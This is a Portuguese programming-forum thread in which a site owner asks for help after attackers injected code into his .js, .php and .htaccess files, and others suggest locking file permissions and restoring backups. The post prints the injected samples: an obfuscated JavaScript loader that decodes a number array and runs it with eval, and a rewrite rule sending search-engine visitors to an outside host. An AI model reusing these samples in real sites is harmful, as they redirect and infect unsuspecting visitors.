Ir para o conteúdo
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

pluis3103

Sites atacados ( ficheiros .htacess php e js )

Mensagens Recomendadas

pluis3103

Boa noite pessoal,

Estou com um problema, alguns dos meus sites estão a ser atacados. O ataque acontece sobre os ficheiros .htacess, js e alguns php.

O que acontece é que é escrito nos ficheiros o seguinte:

.ficheiros javascript e php:

#336988#
<script type=\"text/javascript\" language=\"javascript\">try{window.document.body++}catch(gdsgsdg){dbshre=9;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,110,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,110,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,93,108,105,40,45,97,38,97,105,104,92,38,105,102,42,90,107,108,41,96,106,92,39,106,99,103,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,107,104,102,112,107,93,32,53,8,1,24,25,26,27,106,38,108,110,116,99,93,39,92,106,105,92,94,108,27,52,24,32,42,34,50,5,3,26,27,23,24,108,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,110,37,107,109,115,103,92,38,101,95,97,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,107,39,109,111,112,100,94,40,111,102,104,25,55,27,30,41,105,114,34,50,5,3,7,5,23,24,25,26,100,93,24,33,27,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,34,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,107,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,110,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,106,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s=\"\";for(i=0;i-447!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#

ficheiros .htacess:

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|
allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|
arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|
brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|
clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|
euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|
finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|
friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|
goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-
information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|
kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|
live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|
msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|
passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|
searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|
startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|
telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|
topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|
webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|
wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://aceoot.org/esd.php [R=301,L]
</IfModule>
#/336988#

Alguém me pode ajudar com isto? como posso impedir que estes ficheiros sejam afectados e escritos?

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
pmg

Altera as permissoes de escrita desses ficheiros de forma a que o servidor web nao os possa alterar.


What have you tried?

Não respondo a dúvidas por PM

A minha bola de cristal está para compor; deve ficar pronta para a semana.

Torna os teus tópicos mais atractivos e legíveis usando a tag CODE para colorir o código!

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
apocsantos

Boa noite,

Acede por FTP e altera as permissões. No entanto se o servidor estiver "comprometido" isto de pouco irá servir... Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Se for esse o caso, verifica todos os ficheiros e se tiveres cópias de segurança, repõe as cópias, pois certamente já te alterou mais ficheiros.

Cordiais cumprimentos,

Apocsantos


"A paciência é uma das coisas que se aprendeu na era do 48k" O respeito é como a escrita de código, uma vez perdido, dificilmente se retoma o habito"

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
pluis3103

Boa noite,

Acede por FTP e altera as permissões. No entanto se o servidor estiver "comprometido" isto de pouco irá servir... Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Se for esse o caso, verifica todos os ficheiros e se tiveres cópias de segurança, repõe as cópias, pois certamente já te alterou mais ficheiros.

Cordiais cumprimentos,

Apocsantos

Viva,

Em primeiro lugar obrigado pelas vossas respostas. Ele não deixa qualquer mensagem. Apenas coloca o código que inseri em cima nos ficheiros js(todos) .htacess e index.php

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites
donatello

Boas :)

@pluis3103

Este site está referenciado como tendo malware por Google Safebrowsing e outros.

Recentemente li que um "black-hat", anda a atacar sites em quantidade, recorrendo a falhas tanto nos servidores como nas plataformas... Por acaso não deixa uma mensagem a dizer que "You have been defeaced by hmei7" ??

Também li que houve um ataque e foi deixada a mensagem "hacked by Hmei7" num x.txt em / do site.

Li aqui [http://www.websegura.net/2012/12/hmei7-atacou-centenas-sites-portugueses/] e ainda há sites com esse ficheiro.

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora

×

Aviso Sobre Cookies

Ao usar este site você aceita os nossos Termos de Uso e Política de Privacidade. Este site usa cookies para disponibilizar funcionalidades personalizadas. Para mais informações visite esta página.